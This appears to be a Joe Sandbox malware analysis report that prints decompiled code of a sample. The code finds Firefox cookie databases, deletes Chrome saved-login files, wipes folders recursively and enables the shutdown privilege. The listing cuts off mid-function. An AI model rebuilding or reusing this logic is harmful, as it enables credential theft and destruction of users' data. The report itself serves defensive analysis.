                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID: m3D$m3D$m3D
                    • API String ID: 745075371-2721598275
                    • Opcode ID: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                    • Instruction ID: ce2d0ce6400888a1d824562178e0f2167d8bdbd9356f1224e449ae4cf6748fee
                    • Opcode Fuzzy Hash: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                    • Instruction Fuzzy Hash: 1851A6769002059BEB30DFA5CC45ABFB7B8AF04702F14446BFD04E7292D7B89948CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040B8C7(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				struct _WIN32_FIND_DATAW _v740;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t37;
                    				signed int _t39;
                    				signed int _t41;
                    				void* _t42;
                    				void* _t93;
                    				void* _t94;
                    				void* _t95;
                    				void* _t96;
                    
                    				_t61 = __ebx;
                    				_t95 = __ecx;
                    				E0040415E(__ebx,  &_v28, __edx, _t96, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
                    				L004086C6(__ebx,  &_v28, _t93, _t96, L"\\Mozilla\\Firefox\\Profiles\\");
                    				_t91 =  &_v28;
                    				_t94 = FindFirstFileW(E00401EE4(E004087F0( &_v100,  &_v28, _t96, "*")),  &_v740);
                    				E00401EE9();
                    				if(_t94 != 0xffffffff) {
                    					E004020BF(_t61,  &_v76);
                    					while(1) {
                    						_t37 = FindNextFileW(_t94,  &_v740);
                    						__eflags = _t37;
                    						if(_t37 == 0) {
                    							break;
                    						}
                    						__eflags = _v740.dwFileAttributes & 0x00000010;
                    						if((_v740.dwFileAttributes & 0x00000010) == 0) {
                    							continue;
                    						} else {
                    							_t39 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), 0x4644f0);
                    							__eflags = _t39;
                    							if(_t39 == 0) {
                    								continue;
                    							} else {
                    								_t41 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), L"..");
                    								__eflags = _t41;
                    								if(_t41 == 0) {
                    									continue;
                    								} else {
                    									_t42 = E0040415E(_t61,  &_v148, _t91, _t96, L"\\cookies.sqlite");
                    									_t91 = E004087F0( &_v124,  &_v28, _t96,  &(_v740.cFileName));
                    									E00402F85( &_v52, _t44, _t42);
                    									E00401EE9();
                    									E00401EE9();
                    									__eflags = PathFileExistsW(E00401EE4( &_v52));
                    									if(__eflags != 0) {
                    										FindClose(_t94);
                    										E00403242(_t61, _t95, _t96, __eflags,  &_v52);
                    										E00401EE9();
                    									} else {
                    										E00401EE9();
                    										continue;
                    									}
                    								}
                    							}
                    						}
                    						L10:
                    						E00401FB8();
                    						goto L11;
                    					}
                    					FindClose(_t94);
                    					E0040415E(_t61, _t95, _t91, _t96, 0x46a8f0);
                    					goto L10;
                    				} else {
                    					E0040415E(_t61, _t95,  &_v28, _t96, 0x46a8f0);
                    				}
                    				L11:
                    				E00401EE9();
                    				return _t95;
                    			}

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000,?), ref: 0040B915
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040B9E8
                    • FindClose.KERNEL32(00000000), ref: 0040B9F7
                    • FindClose.KERNEL32(00000000), ref: 0040BA22
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 1164774033-405221262
                    • Opcode ID: 6c21396c8450d45ee7794ff9ed4451fb2f65ce247a2ed991887e1e6d573812c7
                    • Instruction ID: f7360795b1d381be77360ebb1d09811b65db7e4dd05c1cd4fb36acbf7292fd34
                    • Opcode Fuzzy Hash: 6c21396c8450d45ee7794ff9ed4451fb2f65ce247a2ed991887e1e6d573812c7
                    • Instruction Fuzzy Hash: 02315031A042195ACB14F7A2DC9AAEE77B8EF50718F10047FF501B21D2EF789A458A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041AC0A(WCHAR* __ecx, void* __edx) {
                    				short _v524;
                    				short _v1044;
                    				struct _WIN32_FIND_DATAW _v1636;
                    				int _t41;
                    				long _t42;
                    				int _t51;
                    				signed int _t60;
                    				void* _t70;
                    				WCHAR* _t71;
                    				void* _t72;
                    
                    				_t70 = __edx;
                    				_t71 = __ecx;
                    				E0043E0D9( &_v1044, __ecx);
                    				E0043E0FB( &_v1044, L"\\*");
                    				E0043E0D9( &_v524, _t71);
                    				E0043E0FB( &_v524, "\\");
                    				_t72 = FindFirstFileW( &_v1044,  &_v1636);
                    				if(_t72 == 0xffffffff) {
                    					L16:
                    					__eflags = 0;
                    					return 0;
                    				}
                    				E0043E0D9( &_v1044,  &_v524);
                    				_t60 = 1;
                    				do {
                    					_t41 = FindNextFileW(_t72,  &_v1636);
                    					_t76 = _t41;
                    					if(_t41 == 0) {
                    						_t42 = GetLastError();
                    						__eflags = _t42 - 0x12;
                    						if(_t42 != 0x12) {
                    							L15:
                    							FindClose(_t72);
                    							goto L16;
                    						}
                    						_t60 = 0;
                    						__eflags = 0;
                    						goto L13;
                    					}
                    					if(E0041ABDC( &(_v1636.cFileName), _t76) != 0) {
                    						goto L13;
                    					}
                    					E0043E0FB( &_v524,  &(_v1636.cFileName));
                    					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                    						__eflags = _v1636.dwFileAttributes & 0x00000001;
                    						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
                    							SetFileAttributesW( &_v524, 0x80);
                    						}
                    						_t51 = DeleteFileW( &_v524);
                    						__eflags = _t51;
                    						if(_t51 == 0) {
                    							goto L15;
                    						} else {
                    							L10:
                    							E0043E0D9( &_v524,  &_v1044);
                    							goto L13;
                    						}
                    					}
                    					if(E0041AC0A( &_v524, _t70) == 0) {
                    						goto L15;
                    					}
                    					RemoveDirectoryW( &_v524);
                    					goto L10;
                    					L13:
                    				} while (_t60 != 0);
                    				FindClose(_t72);
                    				return RemoveDirectoryW(_t71);
                    			}

                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD07
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD14
                      • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                    • GetLastError.KERNEL32(?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD35
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD5B
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
                    • Opcode ID: c5d6c748a3025e0694e1f413844546567e9bf099f3b664cefe0f3b0174dc0b66
                    • Instruction ID: 3339c7fc43e202b61d2d70908da88035b8b5669b3a5f9347cfb7e72bae01768d
                    • Opcode Fuzzy Hash: c5d6c748a3025e0694e1f413844546567e9bf099f3b664cefe0f3b0174dc0b66
                    • Instruction Fuzzy Hash: 5E31A07280622C9ACB20E761AC48EDB777CAF04305F0401FBF545D2191EF78DAD48A5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00447A10(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				int _v16;
                    				int _v20;
                    				int _v24;
                    				char _v52;
                    				int _v56;
                    				int _v60;
                    				signed int _v100;
                    				char _v272;
                    				intOrPtr _v276;
                    				char _v280;
                    				char _v356;
                    				char _v360;
                    				void* __ebp;
                    				signed int _t65;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t78;
                    				signed int _t85;
                    				signed int _t89;
                    				signed int _t91;
                    				long _t93;
                    				signed int* _t96;
                    				signed int _t99;
                    				signed int _t102;
                    				signed int _t106;
                    				void* _t113;
                    				signed int _t116;
                    				void* _t117;
                    				void* _t119;
                    				void* _t120;
                    				void* _t122;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int* _t128;
                    				signed int _t129;
                    				void* _t132;
                    				void* _t134;
                    				signed int _t135;
                    				signed int _t137;
                    				void* _t140;
                    				intOrPtr _t141;
                    				void* _t143;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t154;
                    				signed int _t158;
                    				signed int _t161;
                    				intOrPtr* _t166;
                    				signed int _t167;
                    				intOrPtr* _t168;
                    				void* _t169;
                    				intOrPtr _t170;
                    				void* _t171;
                    				signed int _t172;
                    				int _t176;
                    				signed int _t178;
                    				char** _t179;
                    				signed int _t183;
                    				signed int _t184;
                    				void* _t191;
                    				signed int _t192;
                    				void* _t193;
                    				signed int _t194;
                    
                    				_t178 = __esi;
                    				_t171 = __edi;
                    				_t65 = E0044764F();
                    				_v8 = _v8 & 0x00000000;
                    				_t137 = _t65;
                    				_v16 = _v16 & 0x00000000;
                    				_v12 = _t137;
                    				if(E004476AD( &_v8) != 0 || E00447655( &_v16) != 0) {
                    					L46:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043A5E8();
                    					asm("int3");
                    					_t191 = _t193;
                    					_t194 = _t193 - 0x10;
                    					_push(_t137);
                    					_t179 = E0044764F();
                    					_v52 = 0;
                    					_v56 = 0;
                    					_v60 = 0;
                    					_t72 = E004476AD( &_v52);
                    					_t143 = _t178;
                    					__eflags = _t72;
                    					if(_t72 != 0) {
                    						L66:
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						E0043A5E8();
                    						asm("int3");
                    						_push(_t191);
                    						_t192 = _t194;
                    						_t74 =  *0x46f00c; // 0x54ba778e
                    						_v100 = _t74 ^ _t192;
                    						 *0x46f344 =  *0x46f344 | 0xffffffff;
                    						 *0x46f338 =  *0x46f338 | 0xffffffff;
                    						_push(0);
                    						_push(_t179);
                    						_push(_t171);
                    						_t139 = "TZ";
                    						_t172 = 0;
                    						 *0x470758 = 0;
                    						_t78 = E0043A9B5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                    						__eflags = _t78;
                    						if(_t78 != 0) {
                    							__eflags = _t78 - 0x22;
                    							if(_t78 == 0x22) {
                    								_t184 = E00444A38(_t143, _v276);
                    								__eflags = _t184;
                    								if(__eflags != 0) {
                    									_t85 = E0043A9B5(__eflags,  &_v280, _t184, _v276, _t139);
                    									__eflags = _t85;
                    									if(_t85 == 0) {
                    										E00445002(0);
                    										_t172 = _t184;
                    									} else {
                    										_push(_t184);
                    										goto L72;
                    									}
                    								} else {
                    									_push(0);
                    									L72:
                    									E00445002();
                    								}
                    							}
                    						} else {
                    							_t172 =  &_v272;
                    						}
                    						asm("sbb esi, esi");
                    						_t183 =  ~(_t172 -  &_v272) & _t172;
                    						__eflags = _t172;
                    						if(_t172 == 0) {
                    							L80:
                    							L47();
                    						} else {
                    							__eflags =  *_t172;
                    							if(__eflags == 0) {
                    								goto L80;
                    							} else {
                    								_push(_t172);
                    								E00447A10(_t139, _t172, _t183, __eflags);
                    							}
                    						}
                    						E00445002(_t183);
                    						__eflags = _v16 ^ _t192;
                    						return E004338BB(_v16 ^ _t192);
                    					} else {
                    						_t89 = E00447655( &_v16);
                    						_pop(_t143);
                    						__eflags = _t89;
                    						if(_t89 != 0) {
                    							goto L66;
                    						} else {
                    							_t91 = E00447681( &_v20);
                    							_pop(_t143);
                    							__eflags = _t91;
                    							if(_t91 != 0) {
                    								goto L66;
                    							} else {
                    								E00445002( *0x470750);
                    								 *0x470750 = 0;
                    								 *_t194 = 0x470760;
                    								_t93 = GetTimeZoneInformation(??);
                    								__eflags = _t93 - 0xffffffff;
                    								if(_t93 != 0xffffffff) {
                    									_t150 =  *0x470760 * 0x3c;
                    									_t167 =  *0x4707b4; // 0x0
                    									_push(_t171);
                    									 *0x470758 = 1;
                    									_v12 = _t150;
                    									__eflags =  *0x4707a6; // 0x0
                    									if(__eflags != 0) {
                    										_t151 = _t150 + _t167 * 0x3c;
                    										__eflags = _t151;
                    										_v12 = _t151;
                    									}
                    									__eflags =  *0x4707fa; // 0x0
                    									if(__eflags == 0) {
                    										L56:
                    										_v16 = 0;
                    										_v20 = 0;
                    									} else {
                    										_t106 =  *0x470808; // 0x0
                    										__eflags = _t106;
                    										if(_t106 == 0) {
                    											goto L56;
                    										} else {
                    											_v16 = 1;
                    											_v20 = (_t106 - _t167) * 0x3c;
                    										}
                    									}
                    									_t176 = E00444607(0, _t167);
                    									_t99 = WideCharToMultiByte(_t176, 0, 0x470764, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										L60:
                    										 *( *_t179) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L60;
                    										} else {
                    											( *_t179)[0x3f] = 0;
                    										}
                    									}
                    									_t102 = WideCharToMultiByte(_t176, 0, 0x4707b8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                    									__eflags = _t102;
                    									if(_t102 == 0) {
                    										L64:
                    										 *(_t179[1]) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L64;
                    										} else {
                    											_t179[1][0x3f] = 0;
                    										}
                    									}
                    								}
                    								 *(E00447649()) = _v12;
                    								 *((intOrPtr*)(E0044763D())) = _v16;
                    								_t96 = E00447643();
                    								 *_t96 = _v20;
                    								return _t96;
                    							}
                    						}
                    					}
                    				} else {
                    					_t168 =  *0x470750; // 0x0
                    					_t178 = _a4;
                    					if(_t168 == 0) {
                    						L12:
                    						E00445002(_t168);
                    						_t154 = _t178;
                    						_t12 = _t154 + 1; // 0x447e01
                    						_t169 = _t12;
                    						do {
                    							_t113 =  *_t154;
                    							_t154 = _t154 + 1;
                    						} while (_t113 != 0);
                    						_t13 = _t154 - _t169 + 1; // 0x447e02
                    						 *0x470750 = E00444A38(_t154 - _t169, _t13);
                    						_t116 = E00445002(0);
                    						_t170 =  *0x470750; // 0x0
                    						if(_t170 == 0) {
                    							goto L45;
                    						} else {
                    							_t158 = _t178;
                    							_push(_t171);
                    							_t14 = _t158 + 1; // 0x447e01
                    							_t171 = _t14;
                    							do {
                    								_t117 =  *_t158;
                    								_t158 = _t158 + 1;
                    							} while (_t117 != 0);
                    							_t15 = _t158 - _t171 + 1; // 0x447e02
                    							_t119 = E0044030E(_t170, _t15, _t178);
                    							_t193 = _t193 + 0xc;
                    							if(_t119 == 0) {
                    								_t171 = 3;
                    								_push(_t171);
                    								_t120 = E00440303(_t159,  *_t137, 0x40, _t178);
                    								_t193 = _t193 + 0x10;
                    								if(_t120 == 0) {
                    									while( *_t178 != 0) {
                    										_t178 = _t178 + 1;
                    										_t171 = _t171 - 1;
                    										if(_t171 != 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_pop(_t171);
                    									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                    									if(_t137 != 0) {
                    										_t178 = _t178 + 1;
                    									}
                    									_t161 = E0043A3AC(_t159, _t178) * 0xe10;
                    									_v8 = _t161;
                    									while(1) {
                    										_t122 =  *_t178;
                    										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                    											break;
                    										}
                    										_t178 = _t178 + 1;
                    									}
                    									__eflags =  *_t178 - 0x3a;
                    									if( *_t178 == 0x3a) {
                    										_t178 = _t178 + 1;
                    										_t161 = _v8 + E0043A3AC(_t161, _t178) * 0x3c;
                    										_v8 = _t161;
                    										while(1) {
                    											_t132 =  *_t178;
                    											__eflags = _t132 - 0x30;
                    											if(_t132 < 0x30) {
                    												break;
                    											}
                    											__eflags = _t132 - 0x39;
                    											if(_t132 <= 0x39) {
                    												_t178 = _t178 + 1;
                    												__eflags = _t178;
                    												continue;
                    											}
                    											break;
                    										}
                    										__eflags =  *_t178 - 0x3a;
                    										if( *_t178 == 0x3a) {
                    											_t178 = _t178 + 1;
                    											_t161 = _v8 + E0043A3AC(_t161, _t178);
                    											_v8 = _t161;
                    											while(1) {
                    												_t134 =  *_t178;
                    												__eflags = _t134 - 0x30;
                    												if(_t134 < 0x30) {
                    													goto L38;
                    												}
                    												__eflags = _t134 - 0x39;
                    												if(_t134 <= 0x39) {
                    													_t178 = _t178 + 1;
                    													__eflags = _t178;
                    													continue;
                    												}
                    												goto L38;
                    											}
                    										}
                    									}
                    									L38:
                    									__eflags = _t137;
                    									if(_t137 != 0) {
                    										_v8 = _t161;
                    									}
                    									__eflags =  *_t178;
                    									_t124 = 0 |  *_t178 != 0x00000000;
                    									_v16 = _t124;
                    									__eflags = _t124;
                    									_t125 = _v12;
                    									if(_t124 == 0) {
                    										_t29 = _t125 + 4; // 0xfffffddd
                    										 *((char*)( *_t29)) = 0;
                    										L44:
                    										 *(E00447649()) = _v8;
                    										_t128 = E0044763D();
                    										 *_t128 = _v16;
                    										return _t128;
                    									}
                    									_push(3);
                    									_t28 = _t125 + 4; // 0xfffffddd
                    									_t129 = E00440303(_t161,  *_t28, 0x40, _t178);
                    									_t193 = _t193 + 0x10;
                    									__eflags = _t129;
                    									if(_t129 == 0) {
                    										goto L44;
                    									}
                    								}
                    							}
                    							goto L46;
                    						}
                    					} else {
                    						_t166 = _t168;
                    						_t135 = _t178;
                    						while(1) {
                    							_t140 =  *_t135;
                    							if(_t140 !=  *_t166) {
                    								break;
                    							}
                    							if(_t140 == 0) {
                    								L8:
                    								_t116 = 0;
                    							} else {
                    								_t9 = _t135 + 1; // 0xdde805eb
                    								_t141 =  *_t9;
                    								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                    									break;
                    								} else {
                    									_t135 = _t135 + 2;
                    									_t166 = _t166 + 2;
                    									if(_t141 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							if(_t116 == 0) {
                    								L45:
                    								return _t116;
                    							} else {
                    								_t137 = _v12;
                    								goto L12;
                    							}
                    							goto L82;
                    						}
                    						asm("sbb eax, eax");
                    						_t116 = _t135 | 0x00000001;
                    						__eflags = _t116;
                    						goto L10;
                    					}
                    				}
                    				L82:
                    			}





































































                    APIs
                    • _free.LIBCMT ref: 00447A92
                    • _free.LIBCMT ref: 00447AB6
                    • _free.LIBCMT ref: 00447C3D
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                    • _free.LIBCMT ref: 00447E09
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID:
                    • API String ID: 314583886-0
                    • Opcode ID: a387b2d2763c336cd0f9efd400082f03a7ae001d9dae8456a42e4e8c50b33189
                    • Instruction ID: 0aa257e2c35749d2f3a928c6468fe730eac10fb1cea6214ff30b616faf06b30b
                    • Opcode Fuzzy Hash: a387b2d2763c336cd0f9efd400082f03a7ae001d9dae8456a42e4e8c50b33189
                    • Instruction Fuzzy Hash: 14C15971908245ABFB149F79DC41AAB7BA9EF41318F1440AFE484A7341E7389E43CB9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0040AF8C(void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				long _t18;
                    				void* _t20;
                    				void* _t21;
                    				void* _t28;
                    				void* _t32;
                    				void* _t33;
                    				void* _t34;
                    
                    				_t37 = __eflags;
                    				_t32 = __edi;
                    				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
                    				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                    				E00401FB8();
                    				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
                    					_t28 = _t34 - 0x18;
                    					_push("\n[Chrome StoredLogins found, cleared!]");
                    					goto L6;
                    				} else {
                    					_t18 = GetLastError();
                    					if(_t18 == 0 || _t18 == 1) {
                    						_t28 = _t34 - 0x18;
                    						_push("\n[Chrome StoredLogins not found]");
                    						L6:
                    						E00402073(_t20, _t28, _t31, _t33);
                    						E0040B752(_t20, _t31, _t33, __eflags);
                    						_t21 = 1;
                    					} else {
                    						_t21 = 0;
                    					}
                    				}
                    				E00401FB8();
                    				return _t21;
                    			}















                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040AFC8
                    • GetLastError.KERNEL32 ref: 0040AFD2
                    Strings
                    • [Chrome StoredLogins not found], xrefs: 0040AFEC
                    • UserProfile, xrefs: 0040AF98
                    • [Chrome StoredLogins found, cleared!], xrefs: 0040AFF8
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040AF93
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • API String ID: 2018770650-1062637481
                    • Opcode ID: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                    • Instruction ID: a37d5e526ed20706eeea9cdf9ddb9e73f46e09c9fe60e21e4a2cfacd82ef4b6e
                    • Opcode Fuzzy Hash: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                    • Instruction Fuzzy Hash: 8001F2B1A802065BCB04B775DC1B8BF7728AD61308B50027FF402B21E2FE39481986CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00416840() {
                    				void* _v8;
                    				intOrPtr _v12;
                    				struct _TOKEN_PRIVILEGES _v24;
                    
                    				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                    				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                    				_v24.PrivilegeCount = 1;
                    				_v12 = 2;
                    				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                    				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                    			}







                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041684D
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00416854
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416866
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416885
                    • GetLastError.KERNEL32 ref: 0041688B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                    • Instruction ID: d2a690f146848b4c7648309cf1ebff16810b1493f15ef7d05bb093e1d547c9c1
                    • Opcode Fuzzy Hash: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                    • Instruction Fuzzy Hash: A2F03A71905229ABDB10ABA0ED0DAEF7FBCEF05612F1000B0B805A1092D6388A04CAF6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E00408909(signed int __ecx, void* __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t101;
                    				intOrPtr* _t106;
                    				signed int _t116;
                    				void* _t128;
                    				void* _t149;
                    				void* _t152;
                    				signed int _t154;
                    				signed int _t167;
                    				signed int _t180;
                    				signed int _t182;
                    				void* _t265;
                    				void* _t267;
                    				void* _t273;
                    				void* _t275;
                    				intOrPtr _t276;
                    				void* _t277;
                    				void* _t280;
                    
                    				_t182 = __ecx;
                    				E00456328(E00456703, _t273);
                    				_t276 = _t275 - 0x300;
                    				_push(_t265);
                    				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
                    				_t180 = _t182;
                    				 *(_t273 - 0x18) = _t180;
                    				E004020BF(_t180, _t273 - 0x9c);
                    				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
                    				 *_t180 = 0;
                    				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
                    				_t260 = _t180 + 4;
                    				E0040480D(_t180 + 4);
                    				_t101 = E004048A8(_t180 + 4, _t265, _t180 + 4);
                    				_t282 = _t101;
                    				if(_t101 == 0) {
                    					_push(0);
                    					_push(0);
                    					goto L4;
                    				} else {
                    					_t276 = _t276 - 0x18;
                    					_t258 = E00402F11(_t273 - 0x6c, _t273 + 0x38, _t273, 0x472ec8);
                    					E00402EF0(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
                    					_push(0x64);
                    					_t180 = _t180 & 0xffffff00 | E00404A81(_t260, _t174, _t282) == 0xffffffff;
                    					E00401FB8();
                    					if(_t180 != 0) {
                    						E00404E06(_t258);
                    						 *((intOrPtr*)(_t273 - 0x20)) = 1;
                    						_push(0x46ccd0);
                    						_t152 = _t273 - 0x20;
                    						L3:
                    						_push(_t152);
                    						L4:
                    						E004379F6();
                    					}
                    				}
                    				_t261 = E004022E5(_t273 + 0x20, _t273 - 0x30);
                    				_t106 = E004022AA(_t273 + 0x20, _t273 - 0x34);
                    				E00409291(_t273 - 0x3c,  *((intOrPtr*)(E004022E5(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
                    				_t277 = _t276 + 0xc;
                    				_t252 = _t273 + 8;
                    				_t267 = FindFirstFileW(E00401EE4(E004087F0(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);
                    				 *(_t273 - 0x1c) = _t267;
                    				E00401EE9();
                    				_t285 = _t267 - 0xffffffff;
                    				if(_t267 != 0xffffffff) {
                    					goto L7;
                    				} else {
                    					_t276 = _t277 - 0x18;
                    					E00402073(_t180, _t276, _t252, _t273, 0x464074);
                    					_push(0x65);
                    					E00404A81( *(_t273 - 0x18) + 4, _t252, _t285);
                    					E00404E06(_t252);
                    					 *((intOrPtr*)(_t273 - 0x24)) = 2;
                    					_push(0x46ccd0);
                    					_t152 = _t273 - 0x24;
                    					goto L3;
                    				}
                    				while(1) {
                    					L7:
                    					_t116 = FindNextFileW(_t267, _t273 - 0x304);
                    					__eflags = _t116;
                    					if(_t116 == 0) {
                    						break;
                    					}
                    					_t180 =  *(_t273 - 0x18);
                    					__eflags =  *_t180;
                    					if( *_t180 == 0) {
                    						__eflags =  *(_t273 - 0x304) & 0x00000010;
                    						if(( *(_t273 - 0x304) & 0x00000010) == 0) {
                    							L17:
                    							E0040415E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);
                    							_t261 = E004022E5(_t273 - 0x84, _t273 - 0x3c);
                    							_t270 = E004022AA(_t273 - 0x84, _t273 - 0x38);
                    							E00409291(_t273 - 0x30,  *((intOrPtr*)(E004022E5(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
                    							_t277 = _t277 + 0xc;
                    							__eflags = E00409114(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
                    							if(__eflags == 0) {
                    								L20:
                    								E00401EE9();
                    								_t267 =  *(_t273 - 0x1c);
                    								continue;
                    							} else {
                    								E00401FC2(_t273 - 0x9c, _t252, _t270, E00402097(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));
                    								E00401FB8();
                    								_t277 = _t277 - 0x18;
